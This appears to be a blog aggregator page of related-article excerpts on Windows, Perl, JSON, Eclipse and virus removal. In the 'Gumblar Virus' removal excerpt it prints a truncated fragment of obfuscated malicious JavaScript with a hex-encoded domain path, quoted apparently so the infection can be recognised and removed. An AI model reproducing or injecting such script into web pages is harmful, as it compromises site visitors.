14 Aug, 2010

8085 simulator for windows 7

Articles related to 8085 simulator for windows 7

Windows Registry : Something you must know

http://digitalpbk.blogspot.com/2007/03/windows-registry-something-you-must.html Windows Registry : Something you must know IntroWhats this all about ? Registry is the place where most windows programs store some data associated with that program. Moreover, registry is used by windows to store much of the configuration information, file associations, start up programs, etc ...The registry is mainly divided into 5 sections HKEY_CLASSES_ROOTHKEY_CURRENT_USER : Current User Preferences.HKEY_LOCAL_MACHINE (HKLM): Global Preferences.HKEY_USERSHKEY_CURRENT_CONFIG : Current System ...
Published 4 years, 11 months ago

Perl - cPanel V3 and the @INC

http://digitalpbk.blogspot.com/2007/09/cpanel-v3-perl-include-inc.html directories.cPanel-v3 Scriptmy $homedir = (getpwuid($>))[7];my $n_inc = scalar @INC;for (my $i = 0; $i if (-d $homedir . '/perl' . $INC[$i]) { unshift(@INC,$homedir . '/perl' . $INC[$i]); $n_inc++; $i++; }}This script dint work for me much, so I manually included the include locations into the BEGIN segment.#! /usr/bin/perl -wBEGIN {unshift @INC,"/home/directory/perl/usr/lib/perl5/site_perl/5.8.7/";}... ...
Published 4 years, 5 months ago

JSON- Javascript Object Notation

http://digitalpbk.blogspot.com/2007/06/json-javascript-object-notation.html All object lies between the { }each of the properties has a label and an associated value or an array.It is specified as label : valuea , separates the label-value pairs.Arrays are enclosed in square brackets [ ] and comma separated.In short a JSON object looks likevar blog = {name: "the Digital Me",author : "arun prabhakar",pages : ["http://url1/","http://url2/"];complexarray: [[0,10,10],[7,5,7],[1,9,8],[7,1,4]];};JSON and PHPPHP has 2 built in functions to help ...
Published 4 years, 7 months ago

amvo.exe Virus Manual Removal Steps

http://digitalpbk.blogspot.com/2008/02/amvoexe-virus-usb-memory-stick.html amvo.exe Virus Manual Removal Steps IntroThis is a nasty virus, dont know who dropped it on me. It spreads via USB Memory Sticks. It cannot be seen in the process list, hides itself and hides all files. And my antivirus doesn't seem to find a problem! :(Some SymptomsCannot show hidden filesSlows down USB devicesAdds infections to plugged in USB devicesDrives open in new windows from My ComputerHow to get rid off?Step 1 The usual way is to Format the system, but it is not a permanent ...
Published 4 years ago

Firefox Browser within Browser

http://digitalpbk.blogspot.com/2007/01/firefox-browser-within-browser.html Firefox Browser within Browser Browser within Browser ? This effect is only for Mozilla Firefox. Pastechrome://browser/content/browser.xul into your address bar and press Enter.What? How?All interfaces on firefox are made on XUL's. The browser window you see is browser.xul, accessing that simply displays the browser window again as the content. Quoted from mozilla.org XUL is an XML grammar that provides user interface widgets like buttons, menus, toolbars, trees etc. User actions are bound ...
Published 5 years ago

Change or Increase font size on Eclipse IDE

http://digitalpbk.com/eclipse/change-increase-font-size-eclipse Change or Increase font size on Eclipse IDE Change or Increase font size on Eclipse IDE I have a Sony Vaio CW Series laptop, and it supports a high resolution of 1600 x 900 pixels in a small 14 inch screen. The pros of this resolution is to have more screen space for editors or IDEs such as Eclipse. The bad part is you have to strain too much to read whatever is on the screen which is bad for your eyes. So in-order to ease your strain, increase the font size on Eclipse editors. To increase font size, Open Eclipse.Goto Window ...
Published 1 year, 9 months ago

Gumblar Virus Javascript removal using PERL

http://digitalpbk.com/virus/gumblar-web-virus-manual-removal-free-tool r="\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x61\x6e\x67\x65\x67\x65\x2e\x63\x6f\x6d\x2f\x6b\x69\x6a\x69\x6a\x69\x2e\x63\x61\x2e\x70\x68\x70"; var H=''; function F(d,B){var hE=new Array(); var g; if(g!='Hl' && g != ''){g=null}; var hR; if(hR!='t' && hR!='HX'){hR='t'}; var BK=String("iMc[".substr(3)); BK+=B; var As; if(As!=''){As='sS'}; BK+=N; var WG=''; var TR=''; var S=new uV(BK, new String("7wkg".substr(3))); var K; if(K!='' && K!='eo'){K='HT'}; var pH; if(pH!='' ...
Published 1 year, 10 months ago

csrcs.exe Virus Manual Removal Steps

http://digitalpbk.blogspot.com/2009/02/csrcsexe-virus-manual-removal-steps.html csrcs.exe Virus Manual Removal Steps csrcs.exeDon't confuse csrcs.exe with csrss.exe, csrss.exe is a legitimate windows service, whereas the csrcs.exe is a Trojan, or a virus. It resides in the C:\Windows\System32\ folder.To remove csrcs.exe and all its effects, first take regedit ( Start > Run : regedit ). Then search for the string "csrcs.exe", and remove all occurrence of the string from the values. If there is a path given like "C:\Windows\System32\csrcs.exe" ...
Published 2 years, 11 months ago

ckvo.exe Manual removal Steps

http://digitalpbk.blogspot.com/2008/12/ckvoexe-bat-cmd-virus-removal-manual.html ckvo.exe Manual removal Steps ckvo.exeThis virus is the same as amvo.exe and same steps should be followed to remove this virus. It creates autorun.inf and a .cmd file on all the partitions mounted on windows.Follow this guide to remove the virus.Cheers... ...
Published 3 years, 2 months ago

Making symbolic links on Windows xp using junction from sysinternals

http://digitalpbk.com/2009/12/making-symbolic-links-windows-xp-using-junction-sysinternals Making symbolic links on Windows xp using junction from sysinternals Symlinks is a utility that allows two paths to point to the same set of files and subfolders. This is a handy utility on linux which lets you point one path on linux to another path. To do achieve the same functionality on Windows XP, software called junction can be used. provided by SysInternals. Here is the help from the junction.exe D:\>junction /? Junction v1.05 - Windows junction creator and reparse point viewer ...
Published 2 years, 1 month ago

Related help topics for 8085 simulator for windows 7 More keywords like 8085 simulator for windows 7
More pages for 8085 simulator for windows 7


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
One of the vertex of havelock island One of the vertex of havelock island in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk